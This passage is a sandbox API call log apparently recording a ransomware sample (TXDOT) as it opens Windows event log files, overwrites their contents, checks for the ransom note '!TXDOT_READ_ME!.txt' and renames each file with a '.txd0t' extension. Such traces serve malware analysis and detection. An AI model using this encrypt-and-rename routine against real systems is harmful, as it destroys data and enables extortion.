lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0088.151] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.151] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0088.151] FlushFileBuffers (hFile=0x474) returned 1 [0088.433] GetProcessHeap () returned 0xe30000 [0088.433] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xe9b648 [0088.433] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" [0088.433] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" [0088.433] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.433] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.433] GetProcessHeap () returned 0xe30000 [0088.433] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.433] CloseHandle (hObject=0x474) returned 1 [0088.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.txd0t")) returned 1 [0088.434] SetEvent (hEvent=0x3f8) returned 1 [0088.435] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0088.436] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" [0088.436] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t" [0088.436] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t") returned 0 [0088.436] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.436] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0088.436] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0088.436] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.437] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0088.437] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.438] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x11000, lpOverlapped=0x0) returned 1 [0088.455] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.455] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x11000, lpOverlapped=0x0) returned 1 [0088.455] FlushFileBuffers (hFile=0x474) returned 1 [0088.788] GetProcessHeap () returned 0xe30000 [0088.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x12c) returned 0xed7f88 [0088.789] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" [0088.789] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned="Microsoft-Windows-DeviceSetupManager%4Operational.evtx" [0088.789] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.789] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.789] GetProcessHeap () returned 0xe30000 [0088.789] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0088.789] CloseHandle (hObject=0x474) returned 1 [0088.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.txd0t")) returned 1 [0088.790] SetEvent (hEvent=0x3f8) returned 1 [0088.791] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0088.791] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" [0088.791] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t" [0088.791] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t") returned 0 [0088.791] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.792] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0088.792] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0088.792] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.792] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0088.793] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.793] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0088.795] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.795] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0088.796] FlushFileBuffers (hFile=0x474) returned 1 [0088.987] GetProcessHeap () returned 0xe30000 [0088.987] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xed7f88 [0088.987] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" [0088.987] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned="Microsoft-Windows-GroupPolicy%4Operational.evtx" [0088.987] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.987] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.987] GetProcessHeap () returned 0xe30000 [0088.987] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0088.987] CloseHandle (hObject=0x474) returned 1 [0088.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.txd0t")) returned 1 [0088.988] SetEvent (hEvent=0x3f8) returned 1 [0088.988] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0088.990] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" [0088.990] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t" [0088.990] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t") returned 0 [0088.990] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0088.990] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0088.990] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0088.990] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.990] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0088.991] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.991] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0088.994] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.994] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0088.995] FlushFileBuffers (hFile=0x474) returned 1 [0089.079] GetProcessHeap () returned 0xe30000 [0089.079] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xed7f88 [0089.079] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" [0089.079] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" [0089.079] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.079] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.079] GetProcessHeap () returned 0xe30000 [0089.079] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.079] CloseHandle (hObject=0x474) returned 1 [0089.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.txd0t")) returned 1 [0089.080] SetEvent (hEvent=0x3f8) returned 1 [0089.080] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.085] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" [0089.085] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t" [0089.085] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t") returned 0 [0089.086] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", dwFileAttributes=0x80) returned 1 [0089.088] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.088] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.088] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.088] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.089] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.089] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0089.097] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.097] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x11000, lpOverlapped=0x0) returned 1 [0089.097] FlushFileBuffers (hFile=0x478) returned 1 [0089.191] GetProcessHeap () returned 0xe30000 [0089.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed17d0 [0089.191] StrCpyW (in: psz1=0xed17d0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" [0089.191] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned="Microsoft-Windows-Kernel-WHEA%4Errors.evtx" [0089.191] StrCpyW (in: psz1=0xed17e8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.191] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.191] GetProcessHeap () returned 0xe30000 [0089.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed17d0 | out: hHeap=0xe30000) returned 1 [0089.191] CloseHandle (hObject=0x478) returned 1 [0089.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.txd0t")) returned 1 [0089.192] SetEvent (hEvent=0x3f8) returned 1 [0089.192] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.204] StrCpyW (in: psz1=0x37ff450, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" [0089.204] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t" [0089.204] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t") returned 0 [0089.205] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.205] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.205] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.205] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.205] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.206] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.206] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff410, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff410*=0x11000, lpOverlapped=0x0) returned 1 [0089.251] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.251] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x37ff414, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff414*=0x11000, lpOverlapped=0x0) returned 1 [0089.251] FlushFileBuffers (hFile=0x460) returned 1 [0089.259] GetProcessHeap () returned 0xe30000 [0089.259] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x140) returned 0xe9b648 [0089.259] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" [0089.259] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" [0089.259] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.259] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.259] GetProcessHeap () returned 0xe30000 [0089.259] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0089.259] CloseHandle (hObject=0x460) returned 1 [0089.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-resource-exhaustion-detector%4operational.evtx.txd0t")) returned 1 [0089.260] SetEvent (hEvent=0x3f8) returned 1 [0089.260] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0089.264] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" [0089.264] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t" [0089.264] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.txd0t") returned 0 [0089.264] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx", dwFileAttributes=0x80) returned 1 [0089.264] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.265] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=69632) returned 1 [0089.265] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.265] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0089.266] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.266] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x11000, lpOverlapped=0x0) returned 1 [0089.268] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.268] WriteFile (in: 